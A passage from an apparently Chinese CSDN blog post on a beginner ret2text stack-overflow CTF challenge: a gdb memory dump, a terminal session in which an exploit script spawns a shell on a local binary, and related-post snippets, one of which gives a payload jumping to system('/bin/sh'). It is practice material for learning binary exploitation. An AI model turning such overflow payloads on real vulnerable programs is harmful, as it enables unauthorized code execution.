0xffffd570:    0x30303d68    0x3d69703a    0x333b3034    0x6f733a33
0xffffd580:    0x3b31303d    0x643a3533    0x31303d6f    0x3a35333b
0xffffd590:    0x343d6462    0x33333b30    0x3a31303b    0x343d6463
0xffffd5a0:    0x33333b30    0x3a31303b    0x343d726f    0x31333b30
0xffffd5b0:    0x3a31303b    0x333d7573    0x31343b37    0x3d67733a
0xffffd5c0:    0x343b3033    0x61633a33    0x3b30333d    0x743a3134
0xffffd5d0:    0x30333d77    0x3a32343b    0x333d776f    0x32343b34
0xffffd5e0:    0x3d74733a    0x343b3733    0x78653a34    0x3b31303d
0xffffd5f0:    0x2a3a3233    0x7261742e    0x3b31303d    0x2a3a3133
0xffffd600:    0x7a67742e    0x3b31303d    0x2a3a3133    0x6a72612e
0xffffd610:    0x3b31303d    0x2a3a3133    0x7a61742e    0x3b31303d
0xffffd620:    0x2a3a3133    0x687a6c2e    0x3b31303d    0x2a3a3133
0xffffd630:    0x6d7a6c2e    0x31303d61    0x3a31333b    0x6c742e2a
0xffffd640:    0x31303d7a    0x3a31333b    0x78742e2a    0x31303d7a
0xffffd650:    0x3a31333b    0x697a2e2a    0x31303d70    0x3a31333b
0xffffd660:    0x3d7a2e2a    0x333b3130    0x2e2a3a31    0x31303d5a
0xffffd670:    0x3a31333b    0x7a642e2a    0x3b31303d    0x2a3a3133
0xffffd680:    0x3d7a672e    0x333b3130    0x2e2a3a31    0x303d7a6c
0xffffd690:    0x31333b31    0x782e2a3a    0x31303d7a    0x3a31333b
0xffffd6a0:    0x7a622e2a    0x31303d32    0x3a31333b    0x7a622e2a
0xffffd6b0:    0x3b31303d    0x2a3a3133    0x7a62742e    0x3b31303d
0xffffd6c0:    0x2a3a3133    0x7a62742e    0x31303d32    0x3a31333b
0xffffd6d0:    0x7a742e2a    0x3b31303d    0x2a3a3133    0x6265642e
0xffffd6e0:    0x3b31303d    0x2a3a3133    0x6d70722e    0x3b31303d
0xffffd6f0:    0x2a3a3133    0x72616a2e    0x3b31303d    0x2a3a3133
gdb-peda$ 
0xffffd700:    0x7261772e    0x3b31303d    0x2a3a3133    0x7261652e
0xffffd710:    0x3b31303d    0x2a3a3133    0x7261732e    0x3b31303d
0xffffd720:    0x2a3a3133    0x7261722e    0x3b31303d    0x2a3a3133
0xffffd730:    0x6563612e    0x3b31303d    0x2a3a3133    0x6f6f7a2e
0xffffd740:    0x3b31303d    0x2a3a3133    0x6970632e    0x31303d6f
0xffffd750:    0x3a31333b    0x7a372e2a    0x3b31303d    0x2a3a3133
0xffffd760:    0x3d7a722e    0x333b3130    0x2e2a3a31    0x3d67706a
0xffffd770:    0x333b3130    0x2e2a3a35    0x6765706a    0x3b31303d
0xffffd780:    0x2a3a3533    0x6669672e    0x3b31303d    0x2a3a3533
0xffffd790:    0x706d622e    0x3b31303d    0x2a3a3533    0x6d62702e
0xffffd7a0:    0x3b31303d    0x2a3a3533    0x6d67702e    0x3b31303d
0xffffd7b0:    0x2a3a3533    0x6d70702e    0x3b31303d    0x2a3a3533
0xffffd7c0:    0x6167742e    0x3b31303d    0x2a3a3533    0x6d62782e
0xffffd7d0:    0x3b31303d    0x2a3a3533    0x6d70782e    0x3b31303d
0xffffd7e0:    0x2a3a3533    0x6669742e    0x3b31303d    0x2a3a3533
0xffffd7f0:    0x6669742e    0x31303d66    0x3a35333b    0x6e702e2a
0xffffd800:    0x31303d67    0x3a35333b    0x76732e2a    0x31303d67
0xffffd810:    0x3a35333b    0x76732e2a    0x303d7a67    0x35333b31
0xffffd820:    0x6d2e2a3a    0x303d676e    0x35333b31    0x702e2a3a
0xffffd830:    0x303d7863    0x35333b31    0x6d2e2a3a    0x303d766f
0xffffd840:    0x35333b31    0x6d2e2a3a    0x303d6770    0x35333b31
0xffffd850:    0x6d2e2a3a    0x3d676570    0x333b3130    0x2e2a3a35
0xffffd860:    0x3d76326d    0x333b3130    0x2e2a3a35    0x3d766b6d
0xffffd870:    0x333b3130    0x2e2a3a35    0x6d626577    0x3b31303d
0xffffd880:    0x2a3a3533    0x6d676f2e    0x3b31303d    0x2a3a3533
0xffffd890:    0x34706d2e    0x3b31303d    0x2a3a3533    0x76346d2e
0xffffd8a0:    0x3b31303d    0x2a3a3533    0x34706d2e    0x31303d76
0xffffd8b0:    0x3a35333b    0x6f762e2a    0x31303d62    0x3a35333b
0xffffd8c0:    0x74712e2a    0x3b31303d    0x2a3a3533    0x76756e2e
0xffffd8d0:    0x3b31303d    0x2a3a3533    0x766d772e    0x3b31303d
0xffffd8e0:    0x2a3a3533    0x6673612e    0x3b31303d    0x2a3a3533
0xffffd8f0:    0x3d6d722e    0x333b3130    0x2e2a3a35    0x62766d72
0xffffd900:    0x3b31303d    0x2a3a3533    0x636c662e    0x3b31303d
0xffffd910:    0x2a3a3533    0x6976612e    0x3b31303d    0x2a3a3533
0xffffd920:    0x696c662e    0x3b31303d    0x2a3a3533    0x766c662e
0xffffd930:    0x3b31303d    0x2a3a3533    0x3d6c672e    0x333b3130
0xffffd940:    0x2e2a3a35    0x303d6c64    0x35333b31    0x782e2a3a
0xffffd950:    0x303d6663    0x35333b31    0x782e2a3a    0x303d6477
0xffffd960:    0x35333b31    0x792e2a3a    0x303d7675    0x35333b31
0xffffd970:    0x632e2a3a    0x303d6d67    0x35333b31    0x652e2a3a
0xffffd980:    0x303d666d    0x35333b31    0x612e2a3a    0x303d7678
0xffffd990:    0x35333b31    0x612e2a3a    0x303d786e    0x35333b31
0xffffd9a0:    0x6f2e2a3a    0x303d7667    0x35333b31    0x6f2e2a3a
0xffffd9b0:    0x303d7867    0x35333b31    0x612e2a3a    0x303d6361
0xffffd9c0:    0x36333b30    0x612e2a3a    0x30303d75    0x3a36333b
0xffffd9d0:    0x6c662e2a    0x303d6361    0x36333b30    0x6d2e2a3a
0xffffd9e0:    0x303d6469    0x36333b30    0x6d2e2a3a    0x3d696469
0xffffd9f0:    0x333b3030    0x2e2a3a36    0x3d616b6d    0x333b3030
0xffffda00:    0x2e2a3a36    0x3d33706d    0x333b3030    0x2e2a3a36
0xffffda10:    0x3d63706d    0x333b3030    0x2e2a3a36    0x3d67676f
gdb-peda$ quit
ningan@ubuntu:~/anan/test$ 
ningan@ubuntu:~/anan/test$ 
ningan@ubuntu:~/anan/test$ ll
total 28
drwxrwxr-x 2 ningan ningan 4096 May 18 22:08 ./
drwxrwxr-x 7 ningan ningan 4096 May 18 20:04 ../
-rw------- 1 ningan ningan  294 May 18 22:08 .gdb_history
-rw-rw-r-- 1 ningan ningan    7 May 18 20:33 peda-session-ret2text.txt
-rwxrwxrwx 1 ningan ningan 9915 May 18 20:01 ret2text*
ningan@ubuntu:~/anan/test$ vim exp.py
ningan@ubuntu:~/anan/test$ 
ningan@ubuntu:~/anan/test$ python exp.py ret2text
  File "exp.py", line 7
SyntaxError: Non-ASCII character '\xe5' in file exp.py on line 7, but no encoding declared; see http://www.python.org/peps/pep-0263.html for details
ningan@ubuntu:~/anan/test$ vim exp.py
ningan@ubuntu:~/anan/test$ python exp.py ret2text
[+] Starting local process './ret2text': pid 3807
[*] '/home/ningan/anan/test/ret2text'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Switching to interactive mode
There is something amazing here, do you know anything?
Maybe I will tell you next time !$ ls
exp.py    peda-session-ret2text.txt  ret2text
$  
 

 

 

安安csdn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【第一天】pwn获取系统权限入门cyclic-附件资源
03-02
【第一天】pwn获取系统权限入门cyclic-附件资源
Pwn学习-ret2text
cdl10000的博客
11-04 125
调用system函数需要b'a'*0x70 + p32(0x804863a),也可以b'a'*112 + p32(0x804863a)发现0x0804863A位置有/bin/sh内容执行system函数。本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。是32位可执行程序,没有开启保护,使用ida查看程序伪代码。ret返回函数的esp地址是0xffffd4cc。shift+f12查看程序是否有shell函数。输入的起始地址是0xffffd45c。因此计算偏移量为70。
网络安全最全pwn入门-buu第二页解(32道)(持续更新中),网络安全视频开发面试问
最新发布
2401_84264096的博客
05-14 873
还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
UBUNTU CRC
在线笔记
10-08 794
$ sudo apt-get install libarchive-zip-perl $ crc32 my_file 管理员在2009年8月13日编辑了该文章文章。 --> --> window._bd
PWN1|WP
l2645470582_的博客
04-11 662
1.检查保护机制 开启了堆栈保护 2.用32位IDA打开该文件 1.shift+f12查看字符串,我们看到有“/bin/sh”关键字符串字样 2. system("/bin/sh")地址为0x0804863A 3.进入main函数,我们看到gets()危险函数 因为gets()函数不限制用户输入,s长度为0x64,所以造成溢出 4.gdb调试 (1)cyclic 200 生成200个有序字符 (2)gdb ./pwn1 run命令运行 g...
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
forgot pwn 入门
02-11
pwn 入门
ret2libc1pwn 入门
02-11
pwn 入门
ret2libc2pwn 入门
02-11
pwn 入门
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
17ret2libc1_64 pwn 入门
02-11
pwn 入门
16ret2libc1_32 pwn 入门
02-11
pwn 入门
pwn学习总结(一) —— 常用命令
qq_41988448的博客
11-18 3113
pwn学习笔记(一)介绍 介绍
pwndbg遇到的问
qq_61953860的博客
07-14 501
File "/home/pwndbg-dev/gdbinit.py", line 101, in import pwndbg # noqa: F401 File "/home/pwndbg-dev/pwndbg/__init__.py", line 6, in import pwndbg.color File "/home/pwndbg-dev/pwndbg/color/__init__.py", line 7, in
栈溢出中偏移的测量
流水不争先,争的是滔滔不绝
03-26 252
栈溢出中栈偏移的测量方法
二进制利用入门Pwn挑战解析
这些挑战通常以二进制漏洞利用的形式出现,即你被提供一个包含某种错误(如缓冲区溢出、类型混淆等)的程序,你需要找到这个漏洞并利用它来获取系统的控制权,或者使程序打印出你要找的“flag”(比赛中的目标字符串...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安安csdn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值